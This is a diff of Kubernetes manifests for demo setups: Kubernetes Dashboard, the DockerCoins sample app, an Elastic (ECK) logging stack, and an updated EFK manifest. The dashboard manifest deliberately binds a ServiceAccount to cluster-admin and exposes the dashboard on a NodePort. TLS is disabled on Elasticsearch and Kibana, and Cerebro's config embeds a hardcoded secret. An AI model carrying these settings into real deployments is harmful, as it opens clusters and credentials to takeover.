- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 8000
|
||||
targetPort: 8000
|
||||
selector:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
|
||||
spec:
|
||||
containers:
|
||||
- name: dashboard-metrics-scraper
|
||||
image: kubernetesui/metrics-scraper:v1.0.4
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
protocol: TCP
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTP
|
||||
path: /
|
||||
port: 8000
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumeMounts:
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
volumes:
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
336
k8s/dashboard-with-token.yaml
Normal file
336
k8s/dashboard-with-token.yaml
Normal file
@@ -0,0 +1,336 @@
|
||||
# This file is based on the following manifest:
|
||||
# https://github.com/kubernetes/dashboard/blob/master/aio/deploy/recommended.yaml
|
||||
# It adds a ServiceAccount that has cluster-admin privileges on the cluster,
|
||||
# and exposes the dashboard on a NodePort. It makes it easier to do quick demos
|
||||
# of the Kubernetes dashboard, without compromising the security too much.
|
||||
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
type: NodePort
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-csrf
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
data:
|
||||
csrf: ""
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-key-holder
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-settings
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster", "dashboard-metrics-scraper"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Metrics Scraper to get metrics from the Metrics server
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods", "nodes"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: kubernetesui/dashboard:v2.0.0
|
||||
imagePullPolicy: Always
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
- --namespace=kubernetes-dashboard
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 8000
|
||||
targetPort: 8000
|
||||
selector:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
|
||||
spec:
|
||||
containers:
|
||||
- name: dashboard-metrics-scraper
|
||||
image: kubernetesui/metrics-scraper:v1.0.4
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
protocol: TCP
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTP
|
||||
path: /
|
||||
port: 8000
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumeMounts:
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
volumes:
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: cluster-admin
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-cluster-admin
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: cluster-admin
|
||||
namespace: kubernetes-dashboard
|
||||
160
k8s/dockercoins.yaml
Normal file
160
k8s/dockercoins.yaml
Normal file
@@ -0,0 +1,160 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hasher
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/hasher:v0.1
|
||||
name: hasher
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: hasher
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: redis
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
spec:
|
||||
containers:
|
||||
- image: redis
|
||||
name: redis
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
ports:
|
||||
- port: 6379
|
||||
protocol: TCP
|
||||
targetPort: 6379
|
||||
selector:
|
||||
app: redis
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: rng
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/rng:v0.1
|
||||
name: rng
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: rng
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: webui
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/webui:v0.1
|
||||
name: webui
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: webui
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
name: worker
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: worker
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/worker:v0.1
|
||||
name: worker
|
||||
69
k8s/eck-cerebro.yaml
Normal file
69
k8s/eck-cerebro.yaml
Normal file
@@ -0,0 +1,69 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
name: cerebro
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: cerebro
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
spec:
|
||||
volumes:
|
||||
- name: conf
|
||||
configMap:
|
||||
name: cerebro
|
||||
containers:
|
||||
- image: lmenezes/cerebro
|
||||
name: cerebro
|
||||
volumeMounts:
|
||||
- name: conf
|
||||
mountPath: /conf
|
||||
args:
|
||||
- -Dconfig.file=/conf/application.conf
|
||||
env:
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
valueFrom:
|
||||
secretKeyRef:
|
||||
name: demo-es-elastic-user
|
||||
key: elastic
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
name: cerebro
|
||||
spec:
|
||||
ports:
|
||||
- port: 9000
|
||||
protocol: TCP
|
||||
targetPort: 9000
|
||||
selector:
|
||||
app: cerebro
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: cerebro
|
||||
data:
|
||||
application.conf: |
|
||||
secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"
|
||||
|
||||
hosts = [
|
||||
{
|
||||
host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
|
||||
name = "demo"
|
||||
auth = {
|
||||
username = "elastic"
|
||||
password = ${?ELASTICSEARCH_PASSWORD}
|
||||
}
|
||||
}
|
||||
]
|
||||
19
k8s/eck-elasticsearch.yaml
Normal file
19
k8s/eck-elasticsearch.yaml
Normal file
@@ -0,0 +1,19 @@
|
||||
apiVersion: elasticsearch.k8s.elastic.co/v1
|
||||
kind: Elasticsearch
|
||||
metadata:
|
||||
name: demo
|
||||
namespace: eck-demo
|
||||
spec:
|
||||
http:
|
||||
tls:
|
||||
selfSignedCertificate:
|
||||
disabled: true
|
||||
nodeSets:
|
||||
- name: default
|
||||
count: 1
|
||||
config:
|
||||
node.data: true
|
||||
node.ingest: true
|
||||
node.master: true
|
||||
node.store.allow_mmap: false
|
||||
version: 7.5.1
|
||||
168
k8s/eck-filebeat.yaml
Normal file
168
k8s/eck-filebeat.yaml
Normal file
@@ -0,0 +1,168 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.inputs:
|
||||
- type: container
|
||||
paths:
|
||||
- /var/log/containers/*.log
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
host: ${NODE_NAME}
|
||||
matchers:
|
||||
- logs_path:
|
||||
logs_path: "/var/log/containers/"
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# node: ${NODE_NAME}
|
||||
# hints.enabled: true
|
||||
# hints.default_config:
|
||||
# type: container
|
||||
# paths:
|
||||
# - /var/log/containers/*${data.kubernetes.container.id}.log
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
- add_host_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: filebeat
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
hostNetwork: true
|
||||
dnsPolicy: ClusterFirstWithHostNet
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat:7.5.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: demo-es-http
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
valueFrom:
|
||||
secretKeyRef:
|
||||
name: demo-es-elastic-user
|
||||
key: elastic
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
- name: NODE_NAME
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: spec.nodeName
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
- name: varlog
|
||||
mountPath: /var/log
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: varlog
|
||||
hostPath:
|
||||
path: /var/log
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
17
k8s/eck-kibana.yaml
Normal file
17
k8s/eck-kibana.yaml
Normal file
@@ -0,0 +1,17 @@
|
||||
apiVersion: kibana.k8s.elastic.co/v1
|
||||
kind: Kibana
|
||||
metadata:
|
||||
name: demo
|
||||
spec:
|
||||
version: 7.5.1
|
||||
count: 1
|
||||
elasticsearchRef:
|
||||
name: demo
|
||||
namespace: eck-demo
|
||||
http:
|
||||
service:
|
||||
spec:
|
||||
type: NodePort
|
||||
tls:
|
||||
selfSignedCertificate:
|
||||
disabled: true
|
||||
1802
k8s/eck-operator.yaml
Normal file
1802
k8s/eck-operator.yaml
Normal file
File diff suppressed because it is too large
Load Diff
127
k8s/efk.yaml
127
k8s/efk.yaml
@@ -3,9 +3,9 @@ apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: fluentd
|
||||
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: fluentd
|
||||
@@ -19,10 +19,9 @@ rules:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: fluentd
|
||||
roleRef:
|
||||
@@ -33,23 +32,22 @@ subjects:
|
||||
- kind: ServiceAccount
|
||||
name: fluentd
|
||||
namespace: default
|
||||
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: fluentd
|
||||
namespace: default
|
||||
labels:
|
||||
k8s-app: fluentd-logging
|
||||
version: v1
|
||||
kubernetes.io/cluster-service: "true"
|
||||
app: fluentd
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: fluentd
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: fluentd-logging
|
||||
version: v1
|
||||
kubernetes.io/cluster-service: "true"
|
||||
app: fluentd
|
||||
spec:
|
||||
serviceAccount: fluentd
|
||||
serviceAccountName: fluentd
|
||||
@@ -58,7 +56,7 @@ spec:
|
||||
effect: NoSchedule
|
||||
containers:
|
||||
- name: fluentd
|
||||
image: fluent/fluentd-kubernetes-daemonset:elasticsearch
|
||||
image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
|
||||
env:
|
||||
- name: FLUENT_ELASTICSEARCH_HOST
|
||||
value: "elasticsearch"
|
||||
@@ -66,14 +64,12 @@ spec:
|
||||
value: "9200"
|
||||
- name: FLUENT_ELASTICSEARCH_SCHEME
|
||||
value: "http"
|
||||
# X-Pack Authentication
|
||||
# =====================
|
||||
- name: FLUENT_ELASTICSEARCH_USER
|
||||
value: "elastic"
|
||||
- name: FLUENT_ELASTICSEARCH_PASSWORD
|
||||
value: "changeme"
|
||||
- name: FLUENT_UID
|
||||
value: "0"
|
||||
- name: FLUENTD_SYSTEMD_CONF
|
||||
value: "disable"
|
||||
- name: FLUENTD_PROMETHEUS_CONF
|
||||
value: "disable"
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
@@ -94,134 +90,87 @@ spec:
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
annotations:
|
||||
deployment.kubernetes.io/revision: "1"
|
||||
creationTimestamp: null
|
||||
generation: 1
|
||||
labels:
|
||||
run: elasticsearch
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
|
||||
namespace: default
|
||||
spec:
|
||||
progressDeadlineSeconds: 600
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
run: elasticsearch
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
maxUnavailable: 1
|
||||
type: RollingUpdate
|
||||
app: elasticsearch
|
||||
template:
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: elasticsearch
|
||||
app: elasticsearch
|
||||
spec:
|
||||
containers:
|
||||
- image: elasticsearch:5.6.8
|
||||
imagePullPolicy: IfNotPresent
|
||||
- image: elasticsearch:5
|
||||
name: elasticsearch
|
||||
resources: {}
|
||||
terminationMessagePath: /dev/termination-log
|
||||
terminationMessagePolicy: File
|
||||
resources:
|
||||
limits:
|
||||
memory: 2Gi
|
||||
requests:
|
||||
memory: 1Gi
|
||||
env:
|
||||
- name: ES_JAVA_OPTS
|
||||
value: "-Xms1g -Xmx1g"
|
||||
dnsPolicy: ClusterFirst
|
||||
restartPolicy: Always
|
||||
schedulerName: default-scheduler
|
||||
securityContext: {}
|
||||
terminationGracePeriodSeconds: 30
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: elasticsearch
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
